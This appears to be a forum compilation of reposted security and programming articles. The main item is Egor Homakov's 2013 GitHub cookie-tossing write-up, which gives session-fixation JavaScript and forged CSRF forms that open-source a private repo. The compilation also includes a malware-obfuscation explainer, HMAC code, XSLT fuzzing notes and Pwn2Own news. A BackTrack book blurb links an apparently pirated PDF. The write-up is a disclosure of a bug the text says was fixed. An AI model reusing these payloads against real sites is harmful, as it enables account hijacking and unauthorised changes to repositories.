    cipher.seal(seal);                        // get the encryption seal
  }
  std::vector<unsigned char> decrypted(ciphertext.size());
  {
    crypto::cipher cipher(key, iv, seal);     // initialize cipher (decrypt mode)
    cipher.associate_data(date);              // add associated data first
    cipher.transform(ciphertext, decrypted);  // do transform (i.e. decrypt)
    cipher.verify();                          // check the seal
  }
  crypto::cleanse(key);                       // clear sensitive data
}
That completes the list of primitives we started off with. There's more to be done, in particular primitives that use public key cryptography, but I'll leave that for some other day.
© 2013 Aldrin D'Souza
Sursa: Cryptographic Primitives in C++
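As a cross-check of the derivation the wrapper standardizes on (PBKDF2 with HMAC-SHA-256 and a default of 10000 iterations), the same key bits can be reproduced from another environment. Here is a sketch using Python's standard hashlib; the password and salt values are made up for illustration:

```python
import hashlib

def derive_key(password: bytes, salt: bytes, iterations: int = 10000) -> bytes:
    # PBKDF2 with HMAC-SHA-256; 16-byte (128-bit) output to match crypto::block
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=16)

key1 = derive_key(b"password", b"0123456789abcdef")
key2 = derive_key(b"password", b"0123456789abcdef")
assert key1 == key2   # same password + salt -> same key bits
assert len(key1) == 16  # a 128-bit key
```

This mirrors the property the article relies on: the key never needs to be stored, because the same password and (public) salt always regenerate it.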
9. [h=3]Hacking Github with Webkit[/h]
Personal: EgorHomakov.com, Consulting: Sakurity
[h=2]Friday, March 8, 2013[/h]
Previously on Github: XSS, CSRF (My github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect...
TL;DR: Github is vulnerable to cookie tossing. We can fixate the _csrf_token value using a Webkit bug and then execute any authorized requests.
[h=2]Github Pages[/h]
Plain HTML pages can be served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea:
If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain.
Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website.
[h=2]Webkit & cookies order[/h]
Our browsers send cookies this way:
Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;
Please keep in mind that the Original _gh_sess and the Dropped _gh_sess are two completely different cookies! They only share the same name. Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for ruby web applications) uses the first one:
cookies.each { |k,v| hash[k] = Array === v ? v.first : v }
Here's another thing: Webkit (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and not even by httpOnly (they should go first obviously). It orders them by creation time (I might be wrong here, but this is how it looks). First of all let's have a look at the HACKED cookie.
PROTIP — save it as decoder.rb and decode sessions faster:
require 'uri'
require 'base64'
p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first)))
ruby decoder.rb BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b
{:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="}
On a subdomain we create _gh_sess=HACKED; Domain=.github.com and call window.open('https://github.com').
Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;
Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly ....
This made our HACKED cookie older than the freshly received ORIGINAL cookie. Repeat the request: window.open('https://github.com').
Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL;
Server responds: Set-Cookie:_gh_sess=HACKED; httponly ....
Voila, we fixated it in the Domain=github.com httponly cookie. Now both the Domain=.github.com and Domain=github.com cookies have the same HACKED value. Destroy the Dropped cookie, and the mission is accomplished:
document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present). It will make you a guest user (logged out), but after logging in the values will remain the same.
[h=2]Steps:[/h]
Let's choose our target. We discussed the XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad, and the Pagebox technique or domain-splitting would fix this. We don't need XSS now since we fixated the CSRF token. (A CSRF attack is almost as serious as XSS. The main profit of XSS is that it can read responses. CSRF is write-only.)
So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber.
I send an email to the Githubber: "Hey, check out this new HTML5 puzzle! http://blabla.github.com/html5_game"
The Githubber opens the game and it executes the following javascript — it replaces his _gh_sess with HACKED (session fixation):
document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;';
x=window.open('https://github.com/');
setTimeout(function(){
  x2=window.open('https://github.com/');
},3000);
setTimeout(function(){
  x.close() && x2.close();
  document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
  //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=
  //insert <script src="/done.js"> every 1 second
},10000);
done=function(v){
  if(v){
    //make repo private again
  }else{
    //keep trying to open source
  }
}
The HACKED session is user_id-less (a guest session). It simply contains session_id and _csrf_token; no certain user is specified there. So the Game asks him explicitly: please Star us on github (or smth like this) <link>. He may feel confused (a little bit) to be logged out. Anyway, he logs in again. The user_id in the session belongs to the Githubber, but the _csrf_token is still ours!
Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default — it means: keep submitting the form to the iframe:
<form target=irf action="https://github.com/github/github/opensource" method="post">
<input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>
At the same time every 1 second I execute on my machine:
git clone git://github.com/github/github.git
As soon as the repo is open sourced my clone request will be accepted. Then I change /done.js to "done(true)".
This will make the Evil game submit a similar form and make github/github private again:
<form target=irf action="https://github.com/github/github/privatesource" method="post">
<input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>
The Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, and his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= Forever. (Only a cookies reset will update it.)
btw i don't like how cookies work
Fast fix — github now expires the Domain=.github.com cookie if 2 _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. A proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as a dashboard and blogspot.com for blogs.
Last time I promised to publish an OAuth security insight. This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy).
P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps tumblr has a similar issue. I didn't bother to check.
Posted by Egor Homakov at 8:33 PM
Sursa: Egor Homakov: Hacking Github with Webkit
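The server-side half of the trick (Rack keeping the first of two same-named cookies, as in the Ruby one-liner quoted above) can be illustrated with a small parser sketch. This is a Python stand-in, not Rack's actual code, and the header value is hypothetical:

```python
def parse_cookie_header(header: str) -> dict:
    """Return one value per cookie name, keeping the FIRST occurrence,
    the way Rack's `v.first` does when a name is sent twice."""
    jar = {}
    for pair in header.split("; "):
        name, _, value = pair.partition("=")
        jar.setdefault(name, value)  # first occurrence wins
    return jar

# Webkit orders cookies by creation time, so an attacker-planted cookie
# can end up first in the header and shadow the legitimate one:
cookies = parse_cookie_header("_gh_sess=HACKED; _gh_sess=ORIGINAL")
assert cookies["_gh_sess"] == "HACKED"
```

The attack only works because browser ordering (creation time) and server disambiguation (first wins) compose badly; neither side can tell which cookie carries which Domain attribute.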
10. Some dark corners of C
A presentation every C programmer should see: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
11. Practical x64 Assembly and C++ Tutorials
A 55-part video series by WhatsACreel. The titled entries in the playlist:
2. Intro, briefly how to call x64 ASM from C++
3. Integer data types so we're all on the same page
4. Intro to Registers, the 8086
5. This one is about the 386 and 486 register sets
6. Finally we get to our modern x64 register set
7. We'll look at a few useful instructions today
8. This one is about the important debugging windows in Visual Studio 2010 Express
9. Today we'll look at Jumps, Labels and Comparing operands
10. This one is how to pass integer parameters via the registers and return them in RAX
11. Some instructions for performing boolean logic
12. Pointers, Memory and the Load Effective Address Instruction
13. Planning prior to programming a small but useful algorithm to Zero an array
14. This is the programming of the algorithm we went through above
15. Intro to reserving space in the data segment
16. This one is about 4 shift instructions, SHL, SHR, SAL and SAR
17. We'll look at the rather strange double precision shifts SHLD and SHRD
18. Some rotate instructions, ROL, ROR, RCL and RCR
19. The Multiplication and Division instructions
20. Flags register and conditional moves and jumps
21. Addressing modes from registers and immediates to SIB pointers
22. Intro to image processing
23. This is the C++ image processing one
24. This is C++ adjust brightness
25. This is the Assembly version of the adjust brightness algorithm
26. This is the Assembly version of the adjust brightness algorithm
27. Introduction to the stack
28. Calling a C++ function from ASM
29. Intro to the rather daunting stack frame
30. The test instruction is an AND but doesn't set the answer in op1
31. Testing single bits from a bit array
32. Many little misc. instructions
33-35. Three tutorials on the string instructions
36. This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition
37. We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int)
38. This one is the Euclidean Algorithm
39. We've finally made it through most of the regular x86 instruction set, now for something completely different
40. Introducing the CPUID instruction
41. A general intro to MMX and a couple of the instructions
42. The addition and subtraction instructions in MMX
43. Multiplication instructions in MMX
44. Bit shifting in MMX
(Entries 45-55 are untitled in the listing.)
Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
12. [h=1]Yes, your code does need comments.[/h]
I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, let's qualify that.
def somefunction(a, b):
    # add a to b
    c = a + b
    # return the result of a + b
    return c
I understand this is a contrived example but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write.
"Code is far better at describing what code does than English, so just write clear code."
This is usually the blowback you get from comments like the ones above. I don't disagree; programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable then comments are unneeded or don't have a place in modern software development.
So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation. Comments that explain what a complex piece of code does, and most importantly what an entire function or Class does and why they exist in the first place.
So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt from that:
class Relay(object):
    """
    Used to talk to your "relay server" or smart host, this is probably
    the most important class in the handlers next to the
    lamson.routing.Router. It supports a few simple operations for
    sending mail, replying, and can log the protocol it uses to stderr
    if you set debug=1 on __init__.
""" def __init__(self, host='127.0.0.1', port=25, username=None, password=None, ssl=False, starttls=False, debug=0): """ The hostname and port we're connecting to, and the debug level (default to 0). Optional username and password for smtp authentication. If ssl is True smtplib.SMTP_SSL will be used. If starttls is True (and ssl False), smtp connection will be put in TLS mode. It does the hard work of delivering messages to the relay host. """ self.hostname = host self.port = port self.debug = debug self.username = username self.password = password self.ssl = ssl self.starttls = starttls ... This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the lamson code and see some good looking Python code but also some usefully documented code. [h=2]So hold on. Why are we writing comments?[/h] Why are we writing comments, if you write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand. In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand the intent of that particular code at that moment in time which may be very different then the intent of the code at time of its original writing. [h=2]Writing comments captures intent.[/h] Writing comments captures the original meaning of the code. Python has docstrings for this, other languages have comparable options. What is so good about docstring type comments? In conjunction with unambiguous class and function names they can easily describe the original intent of your code. Why is capturing the original intent of your code important? It allows a developer, at a glance, to look at a piece of code and know why it exists. It reduces situations where a piece of codes original intent isn't clear then gets modified and leads to unintended regressions. 
It reduces the amount of context a developer must hold in his/her mind to solve any particular problem that may be contained in a piece of code. Writing comments to capture intent is like writing tests to prove that your software does what is expected.
[h=2]Where do we go from here?[/h]
The first step is to realize that the documentation/comments accompanying a piece of code can be just as important as the code itself and need to be maintained as such. Just like code can become stale if you don't keep it updated, so can comments. If you update some code you must update the accompanying comments/documentation or they become useless and can lead to more developer error than not having comments at all. So we have to treat comments and documentation as first class citizens.
Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement but we can cover most issues with some steadfast rules.
- Never name your classes and functions ambiguously.
- Always use inline comments on code blocks that are complicated or may appear unclear.
- Always use descriptive variable names.
- Always write comments describing the intent or reason why a piece of code exists.
- Always keep comments up to date when editing commented code.
As you can see from the points above, code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers.
Sursa: Yes, your code does need comments. - Mike Grouchy
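The rules above can be illustrated with a short, hypothetical Python function whose docstring captures intent (the why) rather than restating the code (the what); the function and its constraints are invented for illustration:

```python
def stable_chunks(items, size):
    """Split `items` into consecutive chunks of at most `size` elements.

    Intent: a downstream batch API (hypothetical) rejects payloads over
    `size` records, so we chunk here once instead of at every call site.
    The last chunk may be short; we deliberately do NOT pad it, because
    the API would treat padding records as real data.
    """
    return [items[i:i + size] for i in range(0, len(items), size)]

assert stable_chunks([1, 2, 3, 4, 5], 2) == [[1, 2], [3, 4], [5]]
```

A maintainer who later "fixes" the short last chunk by padding it would be warned off by the docstring, which is exactly the regression-prevention the article argues for.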
13. BackTrack 5 Cookbook
Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5
Willie Pritchett, David De Smet
- Learn to perform penetration tests with BackTrack 5
- Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 tools
- Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so-popular tools
In Detail
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm.
"BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, privilege escalation, and covering your tracks.
The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests. We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike.
What will you learn from this book:
- Install and set up BackTrack 5 on multiple platforms
- Customize BackTrack to fit your individual needs
- Exploit vulnerabilities found with Metasploit
- Locate vulnerabilities with Nessus and OpenVAS
- Provide several solutions to escalate privileges on a compromised machine
- Learn how to use BackTrack in all phases of a penetration test
- Crack WEP/WPA/WPA2 encryption
- Learn how to monitor and eavesdrop on VoIP networks
Download: https://cdn.anonfiles.com/1358842982481.pdf
Sursa: Data 4 Instruction: BackTrack 5 Cookbook
14. Obfuscation: Malware's best friend
By Joshua Cannell, March 8, 2013, in Malware Intelligence
Here at Malwarebytes, we see a lot of malware. Whether it's a botnet used to attack web servers or a ransomware stealing your files, much of today's malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.
Despite advances in modern malware, dirty programs can't hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware's internals, a technique used in nearly every malware is binary obfuscation.
Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don't want their programs being reverse-engineered or pirated.
Its implementation can be as simple as a few bit manipulations or as advanced as cryptographic standards (e.g. DES, AES). In the world of malware, it's useful to hide significant words the program uses (called "strings") because they give insight into the malware's behavior. Examples of said strings would be malicious URLs or registry keys.
Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer.
Let's see some practical obfuscation examples used in a lot of malware today.
Scenario 1: The exclusive or operation (XOR)
The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation. This is because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data.
Obfuscated data is unreadable in its current form.
In its current form, the data is unreadable. But when we apply an XOR value of 0x55, we see something else entirely.
An XOR operation using 0x55 reveals a malicious URL.
Now we have our malicious URL. Looks like this malware contacts "http://tator1157.hostgator.com" to retrieve the file "bot.exe".
This form of obfuscation is typically very easy to defeat. Even if you don't have the XOR key, programs exist to manually cycle through every possible single-byte XOR value in search of a particular string. One popular tool available on both UNIX and Windows platforms is XORSearch, written by Didier Stevens. This tool searches for strings encoded in multiple formats, including XOR.
Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach, performing an XOR against data with a particular value and then making a second pass with another value. A separate technique (although equally effective) commonly used is to increment the XOR value in a loop. Using the previous example, we could XOR the letter 'h' with 0x55, then the letter 't' with 0x56, and so on. This would also defeat common XOR detection programs.
Scenario 2: Base64 encoding
Base64 encoding has been used for a long time to transfer binary data (machine code) over a system that only handles text.
As the name suggests, its encoding alphabet contains 64 characters, with the equal sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the path to the svchost.exe file, used by Windows to host services. [Image: Base64 is commonly used in malware to disguise text strings.] While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and as downloadable programs.

Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders. This allows for a custom encoding routine that is more difficult to break.

Scenario 3: ROT13

Perhaps the simplest of the three commonly used techniques is ROT13. ROT is short for “rotate”, so ROT13 means “rotate by 13”. ROT13 uses simple letter substitution to achieve obfuscated output. Let’s start by encoding the letter ‘a’. Since we’re rotating by thirteen, we count the next thirteen letters of the alphabet until we land at ‘n’. That’s really all there is to it! [Image: ROT13 uses a simple letter substitution to jumble text.] The above image shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15.

Scenario 4: Runtime packers

In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware’s code until it is placed in memory. This type of obfuscation is achieved with what’s known as a packer program. A packer is a piece of software that takes the original malware file and compresses it, thus making all the original code and data unreadable.
At runtime, a wrapper program takes the packed program and decompresses it in memory, revealing the program’s original code.

Packers have long been used for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers. Fortunately, we aren’t without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEiD (no longer developed, but still available for download). [Image: Exeinfo PE is a great tool for detecting common packers.]

However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware’s contents. This approach defeats modern unpacking scripts and forces reversers to manually unpack the file to see what the program is doing. Rarer still, malware authors will sometimes pack their files twice, first with a commercial packer and then with their own custom packer.

Conclusion

While this list of techniques is certainly not exhaustive, hopefully it has provided a better understanding of how malware hides itself in plain sight. Obfuscation is a highly reliable technique for hiding file contents, and sometimes the entire file itself when a packer program is used. Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well aware of this. Our staff has years of experience in fighting malware and goes to great lengths to see what malicious files are really doing. Bring it on, malware. Do your worst!

Sursa: Obfuscation: Malware’s best friend | Malwarebytes Unpacked
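The XOR tricks from Scenario 1 and the ROT13 substitution from Scenario 3 can be sketched in a few lines of Python. This is illustrative only: the URL is the one recovered in the article, and the registry path is the well-known Run key assumed from the screenshot's description.

```python
import codecs

def xor_single(data: bytes, key: int) -> bytes:
    """Constant single-byte XOR; applying it twice restores the plaintext."""
    return bytes(b ^ key for b in data)

def xor_incrementing(data: bytes, start_key: int) -> bytes:
    """The counter-measure from Scenario 1: the key grows by one per byte."""
    return bytes(b ^ ((start_key + i) & 0xFF) for i, b in enumerate(data))

def xor_search(data: bytes, needle: bytes) -> list:
    """Brute-force all 256 single-byte keys, XORSearch-style."""
    return [k for k in range(256) if needle in xor_single(data, k)]

url = b"http://tator1157.hostgator.com/bot.exe"
hidden = xor_single(url, 0x55)
assert xor_search(hidden, b"hostgator") == [0x55]   # single-byte key recovered

# The incrementing variant defeats the naive single-byte search:
assert xor_search(xor_incrementing(url, 0x55), b"hostgator") == []

# Scenario 3: ROT13 is its own inverse (registry path assumed for illustration)
run_key = r"Software\Microsoft\Windows\CurrentVersion\Run"
assert codecs.encode(codecs.encode(run_key, "rot13"), "rot13") == run_key
```

Running the brute-force over all 256 keys is exactly why the two-pass and incrementing-key variants described above exist.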
  15. Nytro

    Hmac md5/sha1

    [h=1]HMAC MD5/SHA1[/h]

Author: [h=3]RosDevil[/h]

Hi people, this is a correct usage of Windows' WinCrypt APIs to perform HMAC MD5/SHA1. The examples shown on MSDN aren't correct and have some bugs, so I decided to share a correct example.

#include <iostream>
#include <windows.h>
#include <wincrypt.h>

#ifndef CALG_HMAC
#define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC)
#endif
#ifndef CRYPT_IPSEC_HMAC_KEY
#define CRYPT_IPSEC_HMAC_KEY 0x00000100
#endif

#pragma comment(lib, "crypt32.lib")

using namespace std;

char * HMAC(char * str, char * password, DWORD AlgId);

typedef struct _my_blob {
    BLOBHEADER header;
    DWORD len;
    BYTE key[0];
} my_blob;

int main(int argc, _TCHAR* argv[])
{
    char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1);
    char * hash_md5  = HMAC("ROSDEVIL", "password", CALG_MD5);
    cout << "Hash HMAC-SHA1: " << hash_sha1 << " ( " << strlen(hash_sha1) << " )" << endl;
    cout << "Hash HMAC-MD5: "  << hash_md5  << " ( " << strlen(hash_md5)  << " )" << endl;
    cin.get();
    return 0;
}

char * HMAC(char * str, char * password, DWORD AlgId = CALG_MD5)
{
    HCRYPTPROV hProv = 0;
    HCRYPTKEY hKey = 0;
    HCRYPTHASH hHmacHash = 0;
    BYTE * pbHash = 0;
    DWORD dwDataLen = 0;
    HMAC_INFO HmacInfo;
    int err = 0;

    ZeroMemory(&HmacInfo, sizeof(HmacInfo));
    if (AlgId == CALG_MD5) {
        HmacInfo.HashAlgid = CALG_MD5;
        dwDataLen = 16;
    } else if (AlgId == CALG_SHA1) {
        HmacInfo.HashAlgid = CALG_SHA1;
        dwDataLen = 20;
    } else {
        return 0;
    }
    pbHash = new BYTE[dwDataLen];
    ZeroMemory(pbHash, dwDataLen);            // clear the whole digest buffer, not just sizeof(DWORD)
    char * res = new char[dwDataLen * 2 + 1]; // two hex chars per byte plus the terminating NUL

    // Build a PLAINTEXTKEYBLOB around the password so it can be imported as an HMAC key.
    my_blob * kb = NULL;
    DWORD kbSize = sizeof(my_blob) + strlen(password);
    kb = (my_blob*)malloc(kbSize);
    kb->header.bType = PLAINTEXTKEYBLOB;
    kb->header.bVersion = CUR_BLOB_VERSION;
    kb->header.reserved = 0;
    kb->header.aiKeyAlg = CALG_RC2;
    memcpy(&kb->key, password, strlen(password));
    kb->len = strlen(password);

    if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL,
                             CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)) { err = 1; goto Exit; }
    if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)) { err = 1; goto Exit; }
    if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)) { err = 1; goto Exit; }
    if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)) { err = 1; goto Exit; }
    if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)) { err = 1; goto Exit; }
    if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)) { err = 1; goto Exit; }

    // "%02x" zero-pads each byte, so no space-to-zero fixing hack is needed.
    for (unsigned int m = 0; m < dwDataLen; m++)
        sprintf(res + m * 2, "%02x", pbHash[m]);

Exit:
    free(kb);
    if (hHmacHash) CryptDestroyHash(hHmacHash);
    if (hKey) CryptDestroyKey(hKey);
    if (hProv) CryptReleaseContext(hProv, 0);
    delete [] pbHash;
    if (err == 1) { delete [] res; return ""; }
    return res;
}

// Note: with HMAC-MD5 you can implement the famous CRAM-MD5 scheme used to
// authenticate against SMTP servers.

Sursa: HMAC MD5/SHA1 - rohitab.com - Forums
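As a side note, the digests produced by the WinCrypt code above are standard HMACs (RFC 2104), so they can be cross-checked against Python's hmac module. A quick sanity harness (function name is mine) might look like:

```python
import hmac
import hashlib

def hmac_hex(msg: bytes, key: bytes, algo) -> str:
    """Hex-encoded HMAC over msg with the given key, e.g. hashlib.md5/sha1."""
    return hmac.new(key, msg, algo).hexdigest()

md5_hex = hmac_hex(b"ROSDEVIL", b"password", hashlib.md5)
sha1_hex = hmac_hex(b"ROSDEVIL", b"password", hashlib.sha1)

# HMAC-MD5 is 16 bytes (32 hex chars) and HMAC-SHA1 is 20 bytes (40 hex
# chars), matching the lengths printed by the C++ program above.
assert len(md5_hex) == 32
assert len(sha1_hex) == 40
```

If the C++ output differs from these values for the same inputs, the WinCrypt side (key blob, HMAC_INFO, or hex formatting) is the place to look.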
  16. [h=2]Monday, 25 February 2013, 17:26:37 (UTC+0100)[/h] [h=3]Mutation-based fuzzing of XSLT engines[/h]

Intro

In 2011 I did some research on vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This led to a few vulnerabilities (mainly file system access or code execution) in WebKit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, and others. In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoCs affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog post is mainly to show XML newbies what pathological XSLT looks like. Of course, exploit writers could find some useful information too.

When fuzzing XSLT engines by providing malformed XSLT stylesheets, at least three distinct components are tested:
- the XML parser itself, as an XSLT stylesheet is an XML document
- the XSLT interpreter, which needs to compile and execute the provided code
- the XPath engine, because attributes like "match" and "select" use it to reference data

Given that dumb fuzzing is used, the generation of test cases is quite simple. Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using, among other things, grammar-based generation) is on the way and already gives promising results ;-) PoCs were minimized manually, given that the template structure and execution flow of XSLT don't work well with minimizers like tmin or delta.

Intel SOA Expressway XSLT 2.0 Processor

Intel was offering an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even if it has minor real-world relevance. In my opinion, the first bug should have been detected during functional testing.
When idiv (available in XPath 2.0) is used with 1 as the denominator, an optimization/shortcut is taken. But it seems that someone confused the address and the value of the corresponding numerator variable. Please note that the value of the numerator corresponds to 0x41424344 in hex.

Article: http://www.agarri.fr/blog/index.html
  17. A few ideas: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
  18. It's crap. Do Linux, Android, iOS, Mac OS X, Firefox OS or Chrome OS make you pick a browser? Maybe I want Internet Explorer on Linux, through Wine; it should make me choose too!
  19. Not worth the money, nothing special...
  20. Given how complicated these things are, the money is on par. What also matters, though, is how the companies cooperate. The CEO of VUPEN (the best in the "exploit development" business, in my opinion) stated that Microsoft no longer wants to buy their 0-days (the IE10 one on Win8), and as a result those will end up with governments instead. Which is not OK at all.
  21. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h] March 7th, 2013, 14:04 GMT · By Eduard Kovacs

Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn’t be surprised that most of the web browsers have been hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants.

French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. “We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass,” VUPEN wrote on Twitter. “We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP,” the company said two hours later. It appears they hacked Java by leveraging a “unique heap overflow as a memory leak to bypass ASLR and as a code execution.” “ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users,” VUPEN said.

